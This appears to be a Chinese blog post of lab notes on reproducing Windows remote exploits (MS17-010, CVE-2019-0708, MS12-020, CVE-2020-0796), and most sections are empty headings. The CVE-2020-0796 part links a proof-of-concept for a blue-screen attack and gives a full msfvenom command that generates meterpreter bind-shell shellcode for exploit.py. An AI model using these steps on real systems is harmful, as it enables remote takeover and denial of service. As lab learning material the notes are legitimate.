完成ms17-010、cve02019-0708、ms12-020、cve-2020-0796实验并记住 这些常用 漏洞编号
Ms17-010实验




Cve02019-0708实验



cve-2020-0796实验
蓝屏攻击
POC下载:https://github.com/eerykitty/CVE-2020-0796-PoC
用放入kali系统中运行


生成正向连接木马
有关msfvenom详细使用可参考https://www.jianshu.com/p/dee2b171a0a0
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b'\x00' -i 1 -f python



用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)

网友评论